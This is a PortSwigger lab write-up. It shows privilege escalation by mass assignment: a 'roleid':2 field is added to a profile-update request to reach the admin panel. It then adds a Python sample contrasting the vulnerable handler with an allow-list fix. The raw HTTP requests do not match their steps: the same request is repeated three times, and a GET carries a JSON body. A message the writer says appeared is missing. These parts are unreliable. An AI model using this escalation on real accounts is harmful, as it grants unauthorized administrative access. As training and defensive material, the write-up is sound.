portswigger labs: User role controlled by request parameter
In the name of God, the Most Gracious, the Most Merciful.
First, I am sorry about my bad English, but I will try to improve my language in the next write-up, God willing.
When I logged in to the lab, after reading the description of course, which was the following:
"This lab has an admin panel at /admin. It's only accessible to logged-in users with a roleid of
Solve the lab by accessing the admin panel and using it to delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter"
1- I log in to my account using the credentials wiener:peter. I notice that the request contains an id parameter, so I try to change it to 2 and open the admin panel, but the attempt failed:
GET /admin?roleid=2 HTTP/1.1
Host: ac611f951ff0dc2080e05ddc008a00ba.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=R6ZEEFPjue58AQ5K48Tn4owTF6jJp36k
Upgrade-Insecure-Requests: 1
2- I try to write "roleid" instead of id, but it doesn't work:
GET /admin?roleid=2 HTTP/1.1
Host: ac611f951ff0dc2080e05ddc008a00ba.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=R6ZEEFPjue58AQ5K48Tn4owTF6jJp36k
Upgrade-Insecure-Requests: 1
This message appeared to me:
3- I open my account page, change my email to "test@gmail.com", intercept the request with Burp Suite, and add the new parameter "roleid":2 to the JSON body:
GET /admin?roleid=2 HTTP/1.1
Host: ac611f951ff0dc2080e05ddc008a00ba.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=R6ZEEFPjue58AQ5K48Tn4owTF6jJp36k
Upgrade-Insecure-Requests: 1
{"email":"test@gmail.com", "roleid":2}
and the response was the following:
HTTP/1.1 302 Found
Location: /my-account
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 118
{
"username": "wiener",
"email": "test@gmail.com",
"apikey": "GcZo7KbMeVFejMnxJ3i5zAPHI7pObq13",
"roleid": 2
}
So I opened the admin page, deleted the user carlos, and the lab is solved.
Thank you for reading, and I hope you benefited from it.
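Added example, not code from the write-up or from the lab itself: a small Python model of the profile-update handler, showing the mass-assignment behaviour the lab exploits next to an allow-list fix, plus an admin check that reads the role from the stored account rather than from anything in the request. The record layout, the starting roleid of 1 and the function names are assumptions.

```python
import copy
import json

# Constructed sample: the low-privilege account from the write-up before any change.
WIENER = {"username": "wiener", "email": "wiener@example.net", "roleid": 1}
ADMIN_ROLEID = 2  # the admin role value seen in the lab's response body

# Fields a user may edit about themselves. "roleid" is deliberately absent.
SELF_EDITABLE_FIELDS = frozenset({"email"})


def update_profile_vulnerable(user: dict, raw_body: str) -> dict:
    """Mass-assignment bug: every key in the JSON body is copied onto the account.
    This is the behaviour that lets an added "roleid":2 promote the caller."""
    updated = copy.deepcopy(user)
    updated.update(json.loads(raw_body))
    return updated


def update_profile_hardened(user: dict, raw_body: str) -> dict:
    """Only allow-listed fields are copied; anything else is ignored and reported.
    Role changes belong to a separate, admin-only operation, never to self-service."""
    updated = copy.deepcopy(user)
    for key, value in json.loads(raw_body).items():
        if key in SELF_EDITABLE_FIELDS:
            updated[key] = value
        else:
            # Detection hook: unexpected keys on a self-service endpoint are worth alerting on.
            print(f"ignored non-editable field {key!r} sent by {user['username']}")
    return updated


def can_access_admin(user: dict) -> bool:
    """Authorization uses the server-side account record only. A ?roleid=2 query
    parameter (steps 1 and 2 of the write-up) is never part of this decision."""
    return user.get("roleid") == ADMIN_ROLEID


if __name__ == "__main__":
    body = '{"email":"test@gmail.com", "roleid":2}'  # the body sent in step 3
    print(can_access_admin(update_profile_vulnerable(WIENER, body)))  # True: promoted
    print(can_access_admin(update_profile_hardened(WIENER, body)))    # False: still roleid 1
```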